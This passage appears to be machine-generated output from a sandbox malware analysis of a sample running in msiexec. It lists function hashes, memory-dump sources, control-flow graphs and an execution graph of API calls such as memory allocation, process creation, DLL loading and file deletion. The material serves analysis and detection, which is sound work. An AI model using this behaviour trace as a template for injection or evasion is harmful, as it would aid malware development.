                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                            • Instruction ID: 86c99fc65321c2e4f06af9a79c057a69bca138abf5d1e9ceb440bc0dbc18d9e6
                                            • Opcode Fuzzy Hash: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                            • Instruction Fuzzy Hash: EFC08C781E1580EAEB0F4740C920B283A60AB20706F80039CBB41B94A2C3E89852C318
                                            Function 24850750 Relevance: .0, Instructions: 9COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                            • Instruction ID: d426e65f31b1a9b1df2deb3c2dbcdb67dc6cae8d1a61a9840d8c1a267c1b6b51
                                            • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                            • Instruction Fuzzy Hash: E0C08C35320500CFCF01CB19C290F0433E0F700740F000880E801CB721E2A4E800CA00
                                            Function 24893090 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1c808dfc40b9e712deefb9aedea04c06f954e99aafec3f38bc55de228a13f22e
                                            • Instruction ID: 1ff273ad4fafa17cb0f2050c3b714e963c7933476c80778005cb1a14bfd8ebb8
                                            • Opcode Fuzzy Hash: 1c808dfc40b9e712deefb9aedea04c06f954e99aafec3f38bc55de228a13f22e
                                            • Instruction Fuzzy Hash: FF90026175541846D1407198845470700069BD0605F55C111B1025514D8656DAA966F2
                                            Function 24894650 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: be3c86ca17a1bd9c7f66fc67a468653d613861c71995ab0dda70c04577ecc3d0
                                            • Instruction ID: b68964346726e853b2cc8f139380970d42481051735fbcf45b761919b607eb6d
                                            • Opcode Fuzzy Hash: be3c86ca17a1bd9c7f66fc67a468653d613861c71995ab0dda70c04577ecc3d0
                                            • Instruction Fuzzy Hash: 9A9002A1B155108681407198484440660056BE1305395C215B1555520C8658D99992BA
                                            Function 24887630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 124 24887630-24887651 125 2488768b-24887699 call 24894c30 124->125 126 24887653-2488766f call 2485e660 124->126 131 248c4638 126->131 132 24887675-24887682 126->132 135 248c463f-248c4645 131->135 133 2488769a-248876a9 call 24887818 132->133 134 24887684 132->134 140 248876ab-248876c1 call 248877cd 133->140 141 24887701-2488770a 133->141 134->125 137 248c464b-248c46b8 call 248df290 call 24899020 BaseQueryModuleData 135->137 138 248876c7-248876d0 call 24887728 135->138 137->138 161 248c46be-248c46c6 137->161 138->141 149 248876d2 138->149 140->135 140->138 147 248876d8-248876e1 141->147 151 2488770c-2488770e 147->151 152 248876e3-248876f2 call 2488771b 147->152 149->147 153 248876f4-248876f6 151->153 152->153 157 248876f8-248876fa 153->157 158 24887710-24887719 153->158 157->134 160 248876fc 157->160 158->157 162 248c47be-248c47d0 call 24892c50 160->162 161->138 164 248c46cc-248c46d3 161->164 162->134 164->138 166 248c46d9-248c46e4 164->166 167 248c47b9 call 24894d48 166->167 168 248c46ea-248c4723 call 248df290 call 2489aaa0 166->168 167->162 174 248c473b-248c476b call 248df290 168->174 175 248c4725-248c4736 call 248df290 168->175 174->138 180 248c4771-248c477f call 2489a770 174->180 175->141 183 248c4786-248c47a3 call 248df290 call 248ccf9e 180->183 184 248c4781-248c4783 180->184 183->138 189 248c47a9-248c47b2 183->189 184->183 189->180 190 248c47b4 189->190 190->138
                                            Strings
                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 248C4787
                                            • Execute=1, xrefs: 248C4713
                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 248C46FC
                                            • ExecuteOptions, xrefs: 248C46A0
                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 248C4655
                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 248C4725
                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 248C4742
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                            • API String ID: 0-484625025
                                            • Opcode ID: fcd4fdab6d25c3fb32e5a31a734441eec2ee027ee9c6f44148f8b1943a95561f
                                            • Instruction ID: 00cd8806466a1db8647cd5c95536ce95398306e6dc8235daf57e0555f181ef1b
                                            • Opcode Fuzzy Hash: fcd4fdab6d25c3fb32e5a31a734441eec2ee027ee9c6f44148f8b1943a95561f
                                            • Instruction Fuzzy Hash: 0251273162061DFBEB11EBA8DC95FA97BB8EF14700F0403A9E605A7281EB709A45CF50
                                            Function 2489B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 387 2489b5ec-2489b5fc 388 2489b5fe 387->388 389 2489b600-2489b602 387->389 388->389 390 2489b608-2489b60d 389->390 391 2489b830-2489b844 call 24894b87 389->391 392 2489b60f-2489b612 390->392 393 2489b621-2489b62e 390->393 392->391 395 2489b618-2489b61b 392->395 396 2489b631-2489b63d call 2489b5e6 393->396 395->391 395->393 400 2489b64a-2489b653 396->400 401 2489b63f-2489b644 396->401 403 2489b65a-2489b65d 400->403 404 2489b655-2489b658 400->404 401->401 402 2489b646-2489b648 401->402 402->396 405 2489b65f-2489b662 403->405 406 2489b665-2489b66d 403->406 404->405 405->406 407 2489b66f-2489b672 406->407 408 2489b690-2489b693 406->408 409 2489b67c-2489b680 407->409 410 2489b674 407->410 411 2489b6ad-2489b6d4 __aulldvrm 408->411 412 2489b695-2489b698 408->412 414 2489b68a-2489b68d 409->414 415 2489b682-2489b684 409->415 413 2489b676-2489b67a 410->413 417 2489b6d7-2489b6e9 call 2489b5e6 411->417 412->411 416 2489b69a-2489b69e 412->416 413->411 414->408 415->414 418 2489b686-2489b688 415->418 419 2489b6a0-2489b6a2 416->419 420 2489b6a4-2489b6aa 416->420 423 2489b6eb-2489b6f1 417->423 424 2489b6f3-2489b704 call 2489b5e6 417->424 418->413 419->411 419->420 420->411 425 2489b71b-2489b727 423->425 430 2489b70a-2489b713 424->430 431 2489b791-2489b794 424->431 428 2489b729-2489b735 425->428 429 2489b797 425->429 432 2489b737 428->432 433 2489b766-2489b769 428->433 434 2489b79a-2489b79e 429->434 436 2489b718 430->436 437 2489b715 430->437 431->429 438 2489b739-2489b73c 432->438 439 2489b73e-2489b741 432->439 435 2489b76c-2489b786 call 24896580 433->435 440 2489b7ad-2489b7b0 434->440 441 2489b7a0-2489b7a2 434->441 461 2489b789-2489b78c 435->461 436->425 437->436 438->433 438->439 445 2489b743-2489b746 439->445 446 2489b757-2489b762 439->446 447 2489b7df-2489b7ed call 248dd8b0 440->447 448 2489b7b2-2489b7b5 440->448 443 2489b7a4 441->443 444 2489b7a7-2489b7ab 441->444 443->444 454 2489b815-2489b81a 444->454 445->446 455 2489b748-2489b74e 445->455 446->434 451 2489b764 446->451 469 2489b7ef-2489b7f5 447->469 470 2489b7f7-2489b7fa 447->470 449 2489b80f 448->449 450 2489b7b7-2489b7ba 448->450 456 2489b812 449->456 457 2489b7bc-2489b7c1 450->457 458 2489b7ce-2489b7d3 450->458 451->461 459 2489b81c 454->459 460 2489b81e-2489b821 454->460 455->435 463 2489b750 455->463 456->454 457->447 465 2489b7c3-2489b7c6 457->465 458->449 468 2489b7d5 458->468 459->460 466 2489b829-2489b82f 460->466 467 2489b823-2489b827 460->467 461->417 463->446 464 2489b752-2489b755 463->464 464->435 464->446 465->456 471 2489b7c8-2489b7ca 465->471 467->466 468->447 472 2489b7d7-2489b7dd 468->472 469->454 473 2489b7fc-2489b803 470->473 474 2489b805-2489b80d 470->474 471->447 475 2489b7cc 471->475 472->447 472->456 473->454 474->454 475->456
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-$0$0
                                            • API String ID: 1302938615-699404926
                                            • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                            • Instruction ID: 0ade6b9de62d6012ebb6210b61af11bc8e6ab209a0c7ff9155975539b912abf5
                                            • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                            • Instruction Fuzzy Hash: FC81C070E25A49EFDB068F68C891BEEBBF2BF45350F144759E851A7391C734A940CB50
                                            Function 2488B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                            Download Yara Rule
                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 248C728C
                                            Strings
                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 248C7294
                                            • RTL: Resource at %p, xrefs: 248C72A3
                                            • RTL: Re-Waiting, xrefs: 248C72C1
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 885266447-605551621
                                            • Opcode ID: f7c6c812df91deb63b13ff4f90fc0ad0247e5cd715ed4f9782257bd0d15e15ad
                                            • Instruction ID: 6c2a877ceaa13f992f126864fd7f768fa607df2bea440bb9ce08ed74e4f1ee2e
                                            • Opcode Fuzzy Hash: f7c6c812df91deb63b13ff4f90fc0ad0247e5cd715ed4f9782257bd0d15e15ad
                                            • Instruction Fuzzy Hash: 5941D032721A4AEBD715CE25CC41F56BBA5FF94720F100719FA55AB240DB71E842CBD1

                                            Execution Graph

                                            Execution Coverage:2.7%
                                            Dynamic/Decrypted Code Coverage:4%
                                            Signature Coverage:2.1%
                                            Total number of Nodes:476
                                            Total number of Limit Nodes:79
                                            execution_graph 93383 2ec22e7 93386 2ec5e10 93383->93386 93385 2ec2300 93387 2ec5e43 93386->93387 93388 2ec5e67 93387->93388 93393 2ed8980 93387->93393 93388->93385 93391 2ec5e8a 93391->93388 93397 2ed8e10 93391->93397 93392 2ec5f0a 93392->93385 93394 2ed899a 93393->93394 93400 4f02ca0 LdrInitializeThunk 93394->93400 93395 2ed89c6 93395->93391 93398 2ed8e2d 93397->93398 93399 2ed8e3e NtClose 93398->93399 93399->93392 93400->93395 93401 2ebb0e0 93404 2edae10 93401->93404 93403 2ebc751 93407 2ed8f70 93404->93407 93406 2edae41 93406->93403 93408 2ed9005 93407->93408 93410 2ed8f9b 93407->93410 93409 2ed901b NtAllocateVirtualMemory 93408->93409 93409->93406 93410->93406 93411 2ec8367 93412 2ec836a 93411->93412 93413 2ec8321 93412->93413 93415 2ec6ae0 LdrInitializeThunk LdrInitializeThunk 93412->93415 93415->93413 93416 2ec6ca0 93417 2ec6cbc 93416->93417 93421 2ec6d0c 93416->93421 93419 2ed8e10 NtClose 93417->93419 93417->93421 93418 2ec6e41 93420 2ec6cd7 93419->93420 93426 2ec60a0 NtClose LdrInitializeThunk LdrInitializeThunk 93420->93426 93421->93418 93427 2ec60a0 NtClose LdrInitializeThunk LdrInitializeThunk 93421->93427 93423 2ec6e1b 93423->93418 93428 2ec6270 NtClose LdrInitializeThunk LdrInitializeThunk 93423->93428 93426->93421 93427->93423 93428->93418 93434 2ed11e0 93435 2ed11fc 93434->93435 93436 2ed1238 93435->93436 93437 2ed1224 93435->93437 93439 2ed8e10 NtClose 93436->93439 93438 2ed8e10 NtClose 93437->93438 93440 2ed122d 93438->93440 93441 2ed1241 93439->93441 93444 2edafc0 RtlAllocateHeap 93441->93444 93443 2ed124c 93444->93443 93447 2ed14f9 93448 2ed14ff 93447->93448 93449 2ed1522 93447->93449 93448->93449 93451 2ed1504 93448->93451 93450 2ed8e10 NtClose 93449->93450 93452 2ed1529 93450->93452 93455 2ed5430 93451->93455 93454 2ed1518 93456 2ed5495 93455->93456 93457 2ed54cc 93456->93457 93460 2ed0c30 93456->93460 93457->93454 93459 2ed54ae 93459->93454 93461 2ed0bc0 93460->93461 93463 2ed0c3e 93460->93463 93462 2edae10 NtAllocateVirtualMemory 93461->93462 93464 2ed0be1 93462->93464 93463->93459 93463->93463 93464->93459 93465 2eb99f0 93466 2eb9e0a 93465->93466 93468 2eba2fa 93466->93468 93469 2edab00 93466->93469 93470 2edab26 93469->93470 93475 2eb4040 93470->93475 93472 2edab32 93473 2edab6b 93472->93473 93478 2ed50a0 93472->93478 93473->93468 93482 2ec2d80 93475->93482 93477 2eb404d 93477->93472 93479 2ed5101 93478->93479 93481 2ed510e 93479->93481 93506 2ec1560 93479->93506 93481->93473 93483 2ec2d9d 93482->93483 93485 2ec2db3 93483->93485 93486 2ed9860 93483->93486 93485->93477 93488 2ed987a 93486->93488 93487 2ed98a9 93487->93485 93488->93487 93493 2ed8460 93488->93493 93494 2ed847a 93493->93494 93500 4f02c0a 93494->93500 93495 2ed84a6 93497 2edaea0 93495->93497 93503 2ed9180 93497->93503 93499 2ed991c 93499->93485 93501 4f02c11 93500->93501 93502 4f02c1f LdrInitializeThunk 93500->93502 93501->93495 93502->93495 93504 2ed919d 93503->93504 93505 2ed91ae RtlFreeHeap 93504->93505 93505->93499 93507 2ec159b 93506->93507 93522 2ec79d0 93507->93522 93509 2ec15a3 93510 2ec186d 93509->93510 93533 2edaf80 93509->93533 93510->93481 93512 2ec15b9 93513 2edaf80 RtlAllocateHeap 93512->93513 93514 2ec15c7 93513->93514 93515 2edaf80 RtlAllocateHeap 93514->93515 93517 2ec15d5 93515->93517 93520 2ec1669 93517->93520 93547 2ec6560 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 93517->93547 93519 2ec1822 93543 2ed79e0 93519->93543 93536 2ec40b0 93520->93536 93523 2ec79fc 93522->93523 93548 2ec78c0 93523->93548 93526 2ec7a29 93528 2ec7a34 93526->93528 93529 2ed8e10 NtClose 93526->93529 93527 2ec7a41 93530 2ed8e10 NtClose 93527->93530 93531 2ec7a5d 93527->93531 93528->93509 93529->93528 93532 2ec7a53 93530->93532 93531->93509 93532->93509 93559 2ed9130 93533->93559 93535 2edaf98 93535->93512 93538 2ec40d4 93536->93538 93537 2ec40db 93537->93519 93538->93537 93541 2ec40fa 93538->93541 93562 2edc440 LdrLoadDll 93538->93562 93540 2ec4127 93540->93519 93541->93540 93542 2ec411e LdrLoadDll 93541->93542 93542->93540 93544 2ed7a42 93543->93544 93546 2ed7a4f 93544->93546 93563 2ec1880 93544->93563 93546->93510 93547->93520 93549 2ec78da 93548->93549 93553 2ec79b6 93548->93553 93554 2ed8500 93549->93554 93552 2ed8e10 NtClose 93552->93553 93553->93526 93553->93527 93555 2ed851a 93554->93555 93558 4f035c0 LdrInitializeThunk 93555->93558 93556 2ec79aa 93556->93552 93558->93556 93560 2ed914d 93559->93560 93561 2ed915e RtlAllocateHeap 93560->93561 93561->93535 93562->93541 93579 2ec7ca0 93563->93579 93565 2ec18a0 93574 2ec1df0 93565->93574 93583 2ed0bc0 93565->93583 93568 2ec1ab5 93591 2edc190 93568->93591 93569 2ec18fb 93569->93574 93586 2edc060 93569->93586 93571 2ec1b17 93571->93574 93577 2ec03a0 LdrInitializeThunk 93571->93577 93600 2ec7c40 93571->93600 93572 2ec1aca 93572->93571 93597 2ec03a0 93572->93597 93574->93546 93576 2ec7c40 LdrInitializeThunk 93578 2ec1c68 93576->93578 93577->93571 93578->93571 93578->93576 93580 2ec7cad 93579->93580 93581 2ec7cce SetErrorMode 93580->93581 93582 2ec7cd5 93580->93582 93581->93582 93582->93565 93584 2edae10 NtAllocateVirtualMemory 93583->93584 93585 2ed0be1 93584->93585 93585->93569 93587 2edc076 93586->93587 93588 2edc070 93586->93588 93589 2edaf80 RtlAllocateHeap 93587->93589 93588->93568 93590 2edc09c 93589->93590 93590->93568 93592 2edc100 93591->93592 93593 2edaf80 RtlAllocateHeap 93592->93593 93596 2edc15d 93592->93596 93594 2edc13a 93593->93594 93595 2edaea0 RtlFreeHeap 93594->93595 93595->93596 93596->93572 93604 2ed9090 93597->93604 93601 2ec7c53 93600->93601 93609 2ed8360 93601->93609 93603 2ec7c7e 93603->93571 93605 2ed90ad 93604->93605 93608 4f02c70 LdrInitializeThunk 93605->93608 93606 2ec03c2 93606->93578 93608->93606 93610 2ed83de 93609->93610 93611 2ed838b 93609->93611 93614 4f02dd0 LdrInitializeThunk 93610->93614 93611->93603 93612 2ed8403 93612->93603 93614->93612 93615 2ecf2f0 93616 2ecf354 93615->93616 93617 2ec5e10 2 API calls 93616->93617 93619 2ecf487 93617->93619 93618 2ecf48e 93619->93618 93644 2ec5f20 93619->93644 93621 2ecf633 93622 2ecf50a 93622->93621 93623 2ecf642 93622->93623 93648 2ecf0d0 93622->93648 93624 2ed8e10 NtClose 93623->93624 93626 2ecf64c 93624->93626 93627 2ecf546 93627->93623 93628 2ecf551 93627->93628 93629 2edaf80 RtlAllocateHeap 93628->93629 93630 2ecf57a 93629->93630 93631 2ecf599 93630->93631 93632 2ecf583 93630->93632 93657 2ecefc0 CoInitialize 93631->93657 93633 2ed8e10 NtClose 93632->93633 93635 2ecf58d 93633->93635 93636 2ecf5a7 93660 2ed88e0 93636->93660 93638 2ecf622 93639 2ed8e10 NtClose 93638->93639 93640 2ecf62c 93639->93640 93641 2edaea0 RtlFreeHeap 93640->93641 93641->93621 93642 2ecf5c5 93642->93638 93643 2ed88e0 LdrInitializeThunk 93642->93643 93643->93642 93645 2ec5f45 93644->93645 93664 2ed8780 93645->93664 93649 2ecf0ec 93648->93649 93650 2ec40b0 2 API calls 93649->93650 93652 2ecf10a 93650->93652 93651 2ecf113 93651->93627 93652->93651 93653 2ec40b0 2 API calls 93652->93653 93654 2ecf1de 93653->93654 93655 2ec40b0 2 API calls 93654->93655 93656 2ecf23b 93654->93656 93655->93656 93656->93627 93659 2ecf025 93657->93659 93658 2ecf0bb CoUninitialize 93658->93636 93659->93658 93661 2ed88fa 93660->93661 93669 4f02ba0 LdrInitializeThunk 93661->93669 93662 2ed892a 93662->93642 93665 2ed879a 93664->93665 93668 4f02c60 LdrInitializeThunk 93665->93668 93666 2ec5fb9 93666->93622 93668->93666 93669->93662 93670 2eca870 93675 2eca580 93670->93675 93672 2eca87d 93691 2eca200 93672->93691 93674 2eca893 93676 2eca5a5 93675->93676 93703 2ec7eb0 93676->93703 93679 2eca6f0 93679->93672 93681 2eca707 93681->93672 93683 2eca6fe 93683->93681 93686 2eca7f5 93683->93686 93722 2ed48f0 93683->93722 93727 2ec9c50 93683->93727 93685 2ed48f0 GetFileAttributesW 93685->93686 93686->93685 93688 2eca85a 93686->93688 93736 2ec9fc0 93686->93736 93689 2edaea0 RtlFreeHeap 93688->93689 93690 2eca861 93689->93690 93690->93672 93692 2eca216 93691->93692 93695 2eca221 93691->93695 93693 2edaf80 RtlAllocateHeap 93692->93693 93693->93695 93694 2eca242 93694->93674 93695->93694 93696 2ec7eb0 GetFileAttributesW 93695->93696 93697 2eca555 93695->93697 93700 2ed48f0 GetFileAttributesW 93695->93700 93701 2ec9c50 RtlFreeHeap 93695->93701 93702 2ec9fc0 RtlFreeHeap 93695->93702 93696->93695 93698 2eca56e 93697->93698 93699 2edaea0 RtlFreeHeap 93697->93699 93698->93674 93699->93698 93700->93695 93701->93695 93702->93695 93704 2ec7ed1 93703->93704 93705 2ec7ee3 93704->93705 93706 2ec7ed8 GetFileAttributesW 93704->93706 93705->93679 93707 2ed2e00 93705->93707 93706->93705 93708 2ed2e0e 93707->93708 93709 2ed2e15 93707->93709 93708->93683 93710 2ec40b0 2 API calls 93709->93710 93711 2ed2e4a 93710->93711 93712 2ed2e59 93711->93712 93740 2ed28c0 LdrLoadDll LdrLoadDll 93711->93740 93714 2edaf80 RtlAllocateHeap 93712->93714 93718 2ed3007 93712->93718 93715 2ed2e72 93714->93715 93716 2ed2ffd 93715->93716 93715->93718 93719 2ed2e8e 93715->93719 93717 2edaea0 RtlFreeHeap 93716->93717 93716->93718 93717->93718 93718->93683 93719->93718 93720 2edaea0 RtlFreeHeap 93719->93720 93721 2ed2ff1 93720->93721 93721->93683 93724 2ed4955 93722->93724 93723 2ed498c 93723->93683 93724->93723 93741 2ec7f00 93724->93741 93726 2ed496e 93726->93683 93728 2ec9c76 93727->93728 93745 2ecd670 93728->93745 93730 2ec9ce8 93731 2ec9d06 93730->93731 93732 2ec9e70 93730->93732 93733 2ec9e55 93731->93733 93750 2ec9b10 93731->93750 93732->93733 93734 2ec9b10 RtlFreeHeap 93732->93734 93733->93683 93734->93732 93737 2ec9fe6 93736->93737 93738 2ecd670 RtlFreeHeap 93737->93738 93739 2eca06d 93738->93739 93739->93686 93740->93712 93742 2ec7eaf 93741->93742 93743 2ec7ee3 93741->93743 93742->93743 93744 2ec7ed8 GetFileAttributesW 93742->93744 93743->93726 93744->93743 93747 2ecd684 93745->93747 93746 2ecd6a1 93746->93730 93747->93746 93748 2edaea0 RtlFreeHeap 93747->93748 93749 2ecd6de 93748->93749 93749->93730 93751 2ec9b2d 93750->93751 93754 2ecd6f0 93751->93754 93753 2ec9c33 93753->93731 93755 2ecd714 93754->93755 93756 2ecd7be 93755->93756 93757 2edaea0 RtlFreeHeap 93755->93757 93756->93753 93757->93756 93758 2ecfbb0 93759 2ecfbcd 93758->93759 93760 2ec40b0 2 API calls 93759->93760 93761 2ecfbeb 93760->93761 93767 2ed8d70 93768 2ed8de7 93767->93768 93770 2ed8d9b 93767->93770 93769 2ed8dfd NtDeleteFile 93768->93769 93771 2ed1570 93776 2ed1589 93771->93776 93772 2ed1619 93773 2ed15d4 93774 2edaea0 RtlFreeHeap 93773->93774 93775 2ed15e4 93774->93775 93776->93772 93776->93773 93777 2ed1614 93776->93777 93778 2edaea0 RtlFreeHeap 93777->93778 93778->93772 93784 4f02ad0 LdrInitializeThunk 93785 2ec098b PostThreadMessageW 93786 2ec099d 93785->93786 93787 2ec1e85 93788 2ec1e32 93787->93788 93790 2ec1e9d 93788->93790 93792 2ed8ea0 93788->93792 93791 2ec1e4b 93793 2ed8ece 93792->93793 93794 2ed8f32 93792->93794 93793->93791 93797 4f02e80 LdrInitializeThunk 93794->93797 93795 2ed8f63 93795->93791 93797->93795 93798 2ec68c0 93799 2ec68ea 93798->93799 93802 2ec7a70 93799->93802 93801 2ec6914 93803 2ec7a8d 93802->93803 93809 2ed8550 93803->93809 93805 2ec7add 93806 2ec7ae4 93805->93806 93814 2ed8630 93805->93814 93806->93801 93808 2ec7b0d 93808->93801 93810 2ed857e 93809->93810 93811 2ed85ee 93809->93811 93810->93805 93819 4f02f30 LdrInitializeThunk 93811->93819 93812 2ed8627 93812->93805 93815 2ed86e4 93814->93815 93816 2ed8662 93814->93816 93820 4f02d10 LdrInitializeThunk 93815->93820 93816->93808 93817 2ed8729 93817->93808 93819->93812 93820->93817 93821 2ec6e80 93822 2ec6ef2 93821->93822 93823 2ec6e98 93821->93823 93823->93822 93825 2ecad90 93823->93825 93826 2ecadb6 93825->93826 93827 2ecafe3 93826->93827 93852 2ed9210 93826->93852 93827->93822 93829 2ecae2c 93829->93827 93830 2edc190 2 API calls 93829->93830 93831 2ecae4b 93830->93831 93831->93827 93832 2ecaf1f 93831->93832 93833 2ed8460 LdrInitializeThunk 93831->93833 93834 2ec5680 LdrInitializeThunk 93832->93834 93836 2ecaf3b 93832->93836 93835 2ecaead 93833->93835 93834->93836 93835->93832 93838 2ecaeb6 93835->93838 93851 2ecafcb 93836->93851 93858 2ed7fd0 93836->93858 93837 2ec7c40 LdrInitializeThunk 93842 2ecaf15 93837->93842 93838->93827 93844 2ecaee5 93838->93844 93846 2ecaf07 93838->93846 93855 2ec5680 93838->93855 93842->93822 93843 2ec7c40 LdrInitializeThunk 93847 2ecafd9 93843->93847 93873 2ed4220 LdrInitializeThunk 93844->93873 93845 2ecafa2 93863 2ed8080 93845->93863 93846->93837 93847->93822 93849 2ecafbc 93868 2ed81e0 93849->93868 93851->93843 93853 2ed922a 93852->93853 93854 2ed923b CreateProcessInternalW 93853->93854 93854->93829 93856 2ed8630 LdrInitializeThunk 93855->93856 93857 2ec56be 93856->93857 93857->93844 93859 2ed804d 93858->93859 93861 2ed7ffb 93858->93861 93874 4f039b0 LdrInitializeThunk 93859->93874 93860 2ed8072 93860->93845 93861->93845 93864 2ed8100 93863->93864 93865 2ed80ae 93863->93865 93875 4f04340 LdrInitializeThunk 93864->93875 93865->93849 93866 2ed8125 93866->93849 93869 2ed8260 93868->93869 93871 2ed820e 93868->93871 93876 4f02fb0 LdrInitializeThunk 93869->93876 93870 2ed8285 93870->93851 93871->93851 93873->93846 93874->93860 93875->93866 93876->93870 93877 2ec1e00 93878 2ed8460 LdrInitializeThunk 93877->93878 93879 2ec1e36 93878->93879 93880 2ec1e4b 93879->93880 93881 2ed8ea0 LdrInitializeThunk 93879->93881 93881->93880 93882 2ed0d81 93894 2ed8c80 93882->93894 93884 2ed0da2 93885 2ed0dd5 93884->93885 93886 2ed0dc0 93884->93886 93888 2ed8e10 NtClose 93885->93888 93887 2ed8e10 NtClose 93886->93887 93889 2ed0dc9 93887->93889 93891 2ed0dde 93888->93891 93890 2ed0e15 93891->93890 93892 2edaea0 RtlFreeHeap 93891->93892 93893 2ed0e09 93892->93893 93895 2ed8d27 93894->93895 93897 2ed8cab 93894->93897 93896 